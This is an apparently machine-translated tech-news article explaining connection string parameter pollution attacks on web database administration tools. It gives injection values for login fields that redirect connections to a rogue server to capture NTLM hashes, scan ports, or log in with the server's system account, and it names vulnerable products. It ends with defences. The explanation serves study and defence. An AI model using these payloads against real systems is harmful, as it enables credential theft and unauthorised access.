Shulou(Shulou.com)05/31 Report--

How to analyze CSPP connection string parameter pollution attacks, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

Connection string parameter contamination attack

SQL injection attack is the most common injection attack method, which mainly makes use of the implementation defect of web application calling database query to attack.

CSPP attacks, as the name implies, are exploited by exploiting design flaws in the application's connection to the database.

Due to the development direction of WEB application data query system, CSPP attacks have gradually disappeared in the eyes of the public.

(Connection String Parameter PollutionAttacks connection string parameter contamination attack)

0X01 Web application authentication commission

The authentication system of a typical web application has two implementation structures:

1. Create your own credential authentication system (common in WEB applications)

2. Entrust it to the database engine (currently common in intranet applications)

In most cases, application developers choose to use only one user to connect to the database.

From the database side, this database user represents the entire web application, and the web application will use this database connection to implement SQL queries against the custom user table that stores the application's user identity credentials.

Figure 1. Public web Application Authentication Architecture

Web application management login process diagram

The 1.Web application uses its credentials to connect to the database

two。 Query user login information

3. Check the user login information stored in the user customization table

A web application is identified by a database user who can access the entire application content in the database, so it is not possible to implement a granular permission system on different objects in the database, or to track the actions of each user in the web application, and these tasks can only be delegated to the web application itself. This architecture is common and can be found in widely used CMS systems, such as Joomla, Mambo, and many other systems. Typically, the attacker's goal is to obtain application user credentials from the users table in the database.

Another way is to delegate authentication to the database engine so that the connection string no longer contains a fixed set of credentials, but uses the credentials entered by the user and is responsible for checking them by the database engine.

This delegated authentication is often used by database managers so that a user who connects to an application can only access and control objects and operations that he has permissions. With this architecture, a fine-grained permission system can be implemented and users' operations can be tracked in the database.

Figure 2.Web application delegated authentication architecture.

The database engine manages the login process

1.web application requires input credential

two。 The connection string consists of input credentials to connect to the database

3. The role and permissions of the account are determined by the user used in the connection string

The CSPP attacks described in this article focus on the second environment: delegating authentication to the database engine.

Tips: the second architecture is commonly used in older intranet client applications.

0X02 connection string

The connection string is used to connect the application to the database engine.

It specifies the server and port to connect, the database name, authentication credentials, and some connection configuration parameters, such as timeout, alternative database, communication protocol, or encryption options.

A normal connection string for connecting to a Microsoft SQL Server database:

"Data Source=Server, Port; Network Library=DBMSSOCN;Initial Catalog=DataBase; User ID=Username; Password=pwd;"

As shown in the example, a connection string is a set of parameters separated by a semicolon (;), each of which is a key-value pair.

No matter what version of the SQL server is, the connection string syntax of the default support program is the same, no matter what version it is (7, 2000, and 2008).

0X03 connection string injection

In an authorized authentication environment, the connection string injection technique allows an attacker to inject parameters by appending a semicolon (;) to the parameter.

In an example where a user is required to enter a user name and password to create a connection string, an attacker can enter a password, such as "pwd;Encryption=off", and the resulting connection string is as follows:

"Data Source=Server, Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

When you populate the connection string, the encrypted value is added to the previously configured parameter set

0X04 connection string parameter pollution

The parameter pollution technique is used to override the values on the parameters. They are well known in HTTP [5] environments, but they also apply to other environments. In this example, the parameter contamination technique can be applied to the parameters in the connection string, allowing multiple attacks.

Example scenario:

1. A web application running on Windows's IIS Web server

2. A user [User_Value] and a password [Password_Value] are required for user authentication.

3. The application uses the credentials entered by the user to create a connection string to the SQL Server database

As follows:

Data source SQL2005; initial catalog dbl; integrated security=no; user id=+' User_Value' +; Password=+'Password Value' +

PS: integrated security integrated security

This connection string shows how the application connects to the SQL Server database engine.

Knowing this, an attacker can perform a connection string parameter contamination attack.

The idea of this attack is to add a parameter with the desired value to the connection string, regardless of whether the parameter already exists in the string or in a value that has been set.

The .net application defaults to the value of the last occurrence of the parameter in the connection string when it creates a connection string.

That is, if the connection string has two parameters with the key "Data Source", then the value used will be one of the last two pairs, which allows the following CSPP attack vectors:

0X05 CSPP attack 1: Hash theft

An attacker can place a fraudulent SQL Server on Internet for snooping and use the SQL Server credential sniffer to listen (CAIN is used in this example).

An attacker can carry out the following CSPP attacks:

User Value: Data Source = Rogue _ Server (fraudulent server address)

Password Value: Integrated Security true (integrated security enabled)

PS: integrated security integrated security

Correct splicing results in the following connection string:

Data source SQL2005; initial catalog dbl; integrated security=no; user id=;Data Source=Rogue_Server; Password Integrated Security=true

The "Data Source" and "Integrated Security" parameters are overridden, so the SQL Server local driver uses the last set of values and ignores the previous values.

At this point, the application will attempt to connect to the rogue server using the running Windows credentials, which can be either a system user or an application pool user. At this point, by sniffing on the fraudulent server, you can obtain the credentials used by the web application.

0X05 sample 1:ASP.NET Enterprise Manager

ASP.NETEnterprise Manager is an abandoned, unsupported open source database tool that manages SQL Server databases through the web interface and is also available from websites such as SourceForge.

Figure 3. Using CSPP to steal account information in ASP.NET enterprise management tools

Figure 4. The Cain running in the fraudulent server collects the hash value

HASH steals the main process

1. Construct a link to make the server initiate a request with default authentication information to the fraudulent server.

2. The result is that the application sends the credential to the fraudulent server where the database connection sniffer is installed

3. Sniffer CAIN successfully collected LM hashes that allow access to the account.

Tips: you can now use other credential sniffing tools, such as respender

0X07 CSPP attack 2: Port scan

A valid parameter on the connection string is the port to connect to.

An attacker can scan servers on an internal or external network by modifying the port number to try to connect to different ports and by comparing the error messages obtained:

Injection input value:

User_Value: Data Source = Target_Server, Target_ Port

Password Value: Integrated Security true

PS: integrated security integrated security

This input results in the following connection string:

Data source SQL2005; initial catalog dbl; integrated security=no; user id=;Data Source=Target Server, Target Port; Password=; Integrated Security=true

This connection string ignores the first "Data Source" parameter and uses the last "Data Source" parameter, which means that the web application will try to connect to the "Target Port" port on the "Server" machine.

Observe the differences in the error messages returned so that a port scan can be performed.

0x08 example 2: myLittleAdmin and myLittleBackup

Mylittleleadmin and myLittleBackup are both commercial tools developed by myLittleTools. Both tools are vulnerable to CSPP attacks prior to mylittleleadmin 3.5 and myLittleBackup1.6 versions.

Figure 5 allows you to establish a connection to www.gooogle.com through port 80

Figure 6 cannot establish a connection to www.google.com through the XX port

Port scan analysis process:

As shown in figure 5, when the port is listening (open), the error message is that no Microsoft SQL Server is listening, but the TCP connection is established successfully. Indicates that the port is open.

As shown in figure 6, when the port is down, the TCP connection cannot be completed and the error message is different. Using these error messages, you can run a full TCP port scan on the server.

0x09 CSPP attack 3: hijacking Web certificates

An attacker can attempt to connect to the database using a system account by using a web application without requiring the user to provide account password information:

Enter a value:

User Value: Data Source = Target_Server (target server)

Password Value: Integrated Security true (enable integrated security)

PS: integrated security integrated security

These injected values produce the following connection string:

Data source SQL2005; initial catalog dbl; integrated security=no; user id=;Data Source=Target Server, Target Port; Password Integrated Security=true

This time the "integrated security" parameter is overridden mainly with the "True" value.

This means that the system will attempt to connect to the database using the system account under which the tool is running.

In this case, this is the system account used by the web application in the web server.

For PS: integrated security attributes, please see the appendix.

0x10 example 3: SQL Server Web Data Administrator

The version of SQL Server Web Data Administrator posted on Microsoft's website is vulnerable to CSPP attacks.

The screenshot below shows how to access the system using this type of attack.

Figure 7. Using credentials on the WEB Data Administrator tool

Figure 8. Use the server account for console access

Figure 9 system account access authorization.

In figure 7, the password value is as described above: integrated Security=true.

In figure 8, an attacker can log in to the web application to manage the entire system.

As shown in figure 9, the reason for the vulnerability is that all users and network services can access the server.

0x11 Integrated security introduction

Example of a general connection database string:

String constr = "Data source= (local); initial catalog=data;integratedsecurity=true"

Integratedsecurity=false (default)

Indicates that the correct database login name and password must be entered before login authentication can be carried out.

Integratedsecurity=true

Indicates that you can connect to the database without knowing the database user name and password and authenticate with the current application credentials.

By constructing CSPP to overwrite integrated security as true, we can achieve HASH theft, secret-free login and other effects.

0x12 other database connection strings

These technologies are also applicable to other database engines.

Such as the Oracle database, which allows administrators to set integrated security in the database. In addition, in the Oracle connection string, you can change the way users connect by forcing the use of sysdba sessions.

The MySQL database does not allow administrators to configure an integrated security authentication process. However, it is still possible to inject code and manipulate connection strings to try to connect to an internal server that is not exposed to Internet.

Connection strings for various databases

Mysql "Server=localhost;Database=mytest;User=root;Password=;Port=3306;Charset=utf8" SQL Server "Database=MyData;DataSource=NICKYAN-PC;User Id=sa;Password=123123;" Oracle "DataSource=NICKYAN-PC;User Id=PB_DB_USER;Password=123123;IntegratedSecurity=no" OleDB "Provider=Microsoft.Jet.OLEDB.4.0;DataSource=RedGlovePermission.Web\ DB\ MyData.mdb;Persist Security Info=False"

Additional

Integrated security introduction

Example of a general connection database string:

String constr = "Data source= (local); initial catalog=data;integrated security=true"; PS: integrated security integrated security Integrated security there are two optional parameters true and = false integrated security=false (default)

Indicates that the correct database login name and password must be entered before login authentication can be carried out.

Integrated security=true

Indicates that you can connect to the database without knowing the database user name and password and authenticate with the current application credentials.

By constructing CSPP to overwrite integrated security as true, we can achieve HASH theft, secret-free login and other effects.

Connection strings for various databases

Mysql

"Server=localhost;Database=mytest; User=root;Password=;Port=3306;Charset=utf8"

SQL Server

"Database=MyData;Data Source=NICKYAN-PC;User Id=sa;Password=123123;"

Oracle

"Data Source=NICKYAN-PC;User Id=PB_DB_USER;Password=123123;Integrated Security=no"

OleDB

"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=RedGlovePermission.Web\ DB\ MyData.mdb;Persist Security Info=False"

0X13 connection strings for various databases

Microsoft released ConnectionStringbuilder to avoid such attacks, but not all projects are updated to use these new security components. To avoid these attacks, you must filter out semicolon characters, clear all parameters, and strengthen the firewall to not only filter inbound connections, but also prevent outbound connections from internal servers that send NTLM credentials to internet.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.